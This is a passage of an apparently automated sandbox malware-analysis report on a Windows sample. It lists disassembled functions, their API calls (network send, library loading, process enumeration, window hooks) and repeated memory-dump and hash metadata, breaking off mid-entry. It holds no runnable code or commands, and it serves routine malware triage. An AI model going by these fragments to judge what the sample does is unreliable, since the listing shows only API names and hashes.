                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00000000,00000000,00000000,?,?), ref: 0046D1DE
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D202
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastsend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1802528911-0
                                                                                                                                                                                                                                                            • Opcode ID: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                                                                                                                                                                                                                                            • Instruction ID: 3b0603a3594e44eb825cb878ac43b0a40af82fd82cd75190e916dcf9de0a17b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11C476600204AFD310EF69D985B1BB7E8FB88324F10866EF858D7380DA35EC40C7A4
                                                                                                                                                                                                                                                            Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                                                                                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                                                                                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2800547568-0
                                                                                                                                                                                                                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                                                                                                                            Function 0040D3B0 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0040D3CC
                                                                                                                                                                                                                                                              • Part of subcall function 004091E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0042E19F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeekSleepTimetime
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1792118007-0
                                                                                                                                                                                                                                                            • Opcode ID: b23f761a4926100a078f8ea7e5554c9688d511087b6a7685b7d02aad0cb4bb0e
                                                                                                                                                                                                                                                            • Instruction ID: 26d929e072eec6e6aac8e4f5aec239a67d26821fa4f7aa926e5107a94785e9a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b23f761a4926100a078f8ea7e5554c9688d511087b6a7685b7d02aad0cb4bb0e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF05E302442029BC314AF66D549B6ABBE5AB55350F10053EE91997391DBB0A800CB99
                                                                                                                                                                                                                                                            Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                                                                                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2999321469-0
                                                                                                                                                                                                                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                                                                                                                                            Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HookWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2559412058-0
                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                                                                                                            Function 0046F3C1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window_memmove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 517827167-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                                                                                                                                                                                                                                            • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                                                                                                                                                                                                                                            Function 0045774C Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000,?), ref: 00457761
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                                                                            • Opcode ID: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
                                                                                                                                                                                                                                                            • Instruction ID: 5ee34fb173b86911bde6fe8703329502067a709a2034f08e31945737d6b5420b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a9e931f5df7c35fae1f851885a685ed43e1bc238bed7c6dce56ef00f4aff6b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4011A3762002019BD710DF69E840A8BB7E9AF89315F11C57FE9598B242CB78B8458B94
                                                                                                                                                                                                                                                            Function 00441EBA Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00441ECD
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3469035223-0
                                                                                                                                                                                                                                                            • Opcode ID: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
                                                                                                                                                                                                                                                            • Instruction ID: 2fbb190dad4ce56573c0fa61da4d13feb20fc8bc688041f2d473ed6297838154
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F03172600204AFD700DF9DEC8199BB3E8EF88725F14812AFA18D7251D6B5ED458BA5
                                                                                                                                                                                                                                                            Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __lock_file
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3031932315-0
                                                                                                                                                                                                                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                                                                                                                                            Function 00443D19 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00443D34
                                                                                                                                                                                                                                                              • Part of subcall function 00433D9E: EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnumProcesses_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3303492691-0
                                                                                                                                                                                                                                                            • Opcode ID: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
                                                                                                                                                                                                                                                            • Instruction ID: 973e428d5754fd58bf011f848023120356fa753a79d0ada774503799e32604de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05E0E5B3A010187BEA106A4ABC81DCB735CDBCA72EF040027F60887221E229AE0542F9
                                                                                                                                                                                                                                                            Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __lock_file.LIBCMT ref: 004142F5
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2597487223-0
                                                                                                                                                                                                                                                            • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                                                                                                                                                                            • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                                                                                                                                                                                                            Function 004589AC Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 004589C6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
